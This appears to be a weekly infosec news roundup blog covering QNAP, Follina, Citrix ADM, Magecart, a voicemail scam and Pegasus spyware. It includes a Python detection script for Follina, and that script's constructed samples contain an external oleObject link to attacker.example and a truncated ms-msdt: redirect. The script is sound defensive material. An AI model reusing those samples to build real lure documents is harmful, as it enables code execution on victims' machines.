Weekly Infosec News Summary

Let’s examine the most notable cyber events of the past week from different parts of the world.

Vulnerabilities & Attacks News

Critical PHP vulnerability opens QNAP NAS devices to remote attacks

This week in infosec news, a critical PHP vulnerability was found to expose QNAP NAS devices to remote attacks.[1] The flaw sits in the web server stack of the device firmware and could allow an attacker to execute code on the device, take control of it and access the data stored on it.

Customers are advised to update their QTS or QuTS hero operating systems and, in addition, not to expose the devices directly to the internet.

Additionally, for devices already hit by the DeadBolt ransomware, QNAP recommends that customers who have obtained a decryption key but can no longer find the ransom note (the page where the key is entered) after updating the firmware contact QNAP Support for help.

This shows once again why it is important to test your infrastructure for security issues regularly. Luckily, it just so happens that you’re reading a blog post by the people who can help you. Check out our website for more information on our penetration tests and vulnerability assessments. 😉

Russia exploits Microsoft Follina vulnerability against Ukraine

This week’s story comes from Ukraine, where Russian hackers have used the Follina flaw to access sensitive information.[2]

Follina, disclosed a few weeks ago, is a flaw in the Microsoft Support Diagnostic Tool (MSDT) that is reachable from Office documents on all supported versions of Windows.[3] A crafted document invokes the ms-msdt: protocol handler when it is opened (or, for RTF files, merely previewed) and runs code as the user without any macros, so an attacker needs nothing more than a victim who opens an emailed attachment; no prior foothold in the target network is required. In the case of the Ukrainian attacks, the hackers used the Follina flaw to deploy a backdoor called Poison Ivy, which gave them access to sensitive data.

These attacks underscore the need for organizations to patch their systems as soon as possible and implement robust security measures.
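As an added example, not part of the original article or of any vendor tooling, the script below shows the two things a triage check can look for in a suspect document: an oleObject relationship in the .docx package that points at an external URL, and an ms-msdt: URI in the page that URL serves. The sample documents, the HTML fragment and the attacker.example hostname are all constructed for the example.

```python
"""Added example: flag the Follina (CVE-2022-30190) delivery pattern in Office files.

Follina documents reach MSDT in two steps: the .docx carries an oleObject
relationship whose Target is an *external* URL, and the HTML fetched from that
URL redirects the embedded browser control to an ms-msdt: URI.  Both checks
below work offline on constructed inputs; attacker.example is a made-up host.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
REL_TAG = f"{{{RELS_NS}}}Relationship"

# Matches the scheme of the MSDT protocol handler anywhere in a fetched page.
MSDT_URI = re.compile(r"ms-msdt:", re.IGNORECASE)


def external_ole_targets(docx_bytes: bytes) -> list[tuple[str, str]]:
    """Return (rels part, Target) pairs for oleObject relationships that point
    outside the package.  Embedded OLE objects (no TargetMode="External") are
    normal in Office files and are not reported."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_TAG):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"):
                    hits.append((name, rel.get("Target", "")))
    return hits


def html_invokes_msdt(html: str) -> bool:
    """True if the page tries to launch the MSDT protocol handler."""
    return MSDT_URI.search(html) is not None


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal docx-shaped zip around the given document.xml.rels part
    (constructed test input, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed samples.  The benign file embeds an OLE object inside the package;
# the suspicious one references an external HTML page, trailing "!" included,
# as the in-the-wild Follina documents did.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/>
</Relationships>"""

SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="http://attacker.example/payload.html!" TargetMode="External"/>
</Relationships>"""

# Constructed fragment of the kind of page the external target would serve.
SUSPICIOUS_HTML = '<script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param ...";</script>'


def scan(docx_bytes: bytes) -> dict:
    """Summarise what a triage script would report for one file."""
    ole = external_ole_targets(docx_bytes)
    return {"external_ole_targets": ole, "suspicious": bool(ole)}


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        print(label, scan(build_docx(rels)))
    print("html launches MSDT:", html_invokes_msdt(SUSPICIOUS_HTML))
```

The relationship check is the useful one at the mail gateway, because it needs no network access and an external oleObject target is rare in legitimate documents; the ms-msdt: check applies to the fetched page and also to proxy logs or sandbox output. Neither replaces the patch, and Microsoft’s interim mitigation of removing the ms-msdt: protocol handler registration is still the right stopgap for hosts that cannot be updated immediately.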

Vulnerability in Citrix ADM allows admin passwords to be reset

Recently, a critical Citrix ADM vulnerability was discovered that creates a means to reset admin passwords. 

Because of an improper access control vulnerability (CVE-2022-27511), a remote, unauthenticated user could corrupt the system, with the result that the administrator credentials are reset at the next reboot.

The vulnerability could be exploited to force the “reset of the administrator password at the next device reboot, allowing an attacker with SSH [Secure Shell] access to connect with the default administrator credentials after the device has rebooted,” according to a Citrix advisory published last week. [4]

The vulnerability affects Citrix ADM (Application Delivery Management) server, the management platform for Citrix ADC and Gateway appliances, and can be exploited by an unauthenticated attacker to gain administrative access to it. While the patch for this vulnerability has been available for several weeks, it is unclear how many installations are still vulnerable.

News Related to Threat Actors & Campaigns

Chinese hackers are distributing SMS bomber tools with malware inside

Chinese hackers are distributing an SMS bomber tool with malware hidden inside. The tool, designed to flood a chosen phone number with text messages, includes a backdoor that allows the attacker to execute commands remotely on the victim’s device. The malware has been spreading via a phishing campaign that targets Android users in China. Once installed, it collects information about the victim’s device and sends it to a remote server. [5]

Insights into Magecart’s infrastructure reveal that the campaign is vast

Infosec researchers have mapped new Magecart infrastructure that reveals the scale of the ongoing skimming campaigns.[6] It consists of several servers that collect and store stolen credit card data. The servers are located in different parts of the world, suggesting that the people behind Magecart use a distributed network to avoid detection and takedowns. The findings underscore how important it is for companies running web shops to be vigilant against Magecart attacks, and how cybercriminals use increasingly sophisticated methods to steal sensitive information.

Other News Related to Business, Politics, and Culture

Cyberattacks on Ukraine highlighted by Microsoft

On Wednesday, Microsoft announced it had uncovered new evidence of Russian state-sponsored attacks on Ukrainian entities. The findings come as Russia’s war against Ukraine continues. In a blog post, Microsoft’s Threat Intelligence Center said it had observed a group of hackers known as Strontium targeting government agencies, political parties, and media organizations in Ukraine. Russian state actors have also been linked to previous attacks on the Ukrainian power grid and the NotPetya malware outbreak. [8] Microsoft did not name any specific targets of the latest attacks but said they were “consistent with the group’s longstanding interest in Ukrainian affairs.”

Earlier this week, Ukrainian security officials said they had uncovered a plot to disrupt the country’s financial system and critical infrastructure. 

Scammer steals Microsoft credentials with voicemail scam

Recent scams target Microsoft users to steal their credentials.[9] The scam starts with a voicemail purporting to come from Microsoft and stating that there has been a problem with the recipient’s account. The message then instructs the user to call a phone number to resolve the issue. However, the phone number belongs to a scammer who tries to trick the user into revealing their login information. There have been many scams targeting Microsoft users recently, so it’s essential to be vigilant when dealing with unsolicited calls or messages: never call a number or follow a link from such a message, and look up the vendor’s official support contacts yourself instead. If you suspect that you may have been a victim of this scam, change your password and enable two-factor authentication on your account as soon as possible.

Five European countries use Pegasus spyware, NSO confirms

The NSO Group has long been known for selling its spyware to government organizations worldwide. Now, new information has surfaced that suggests at least five European countries have used Pegasus spyware to target opponents and journalists. The software, designed to infect phones and collect data, was first used by the UAE to target human rights activists. It was then acquired by Mexico, where it was used to target journalists investigating corruption. [10]

This new information confirms what many infosec experts have long suspected: that governments worldwide are using NSO Group’s spyware to violate human rights.

We are witnessing an increase in cybercrime as we move further into the digital age. Every week, it seems like there’s a new story of some major data breach or cyber attack making headlines. This week was no different, and the items above are just a few of the major stories from the infosec world. Next week, we’ll be back with another news summary, so be sure to add this blog to your reading list.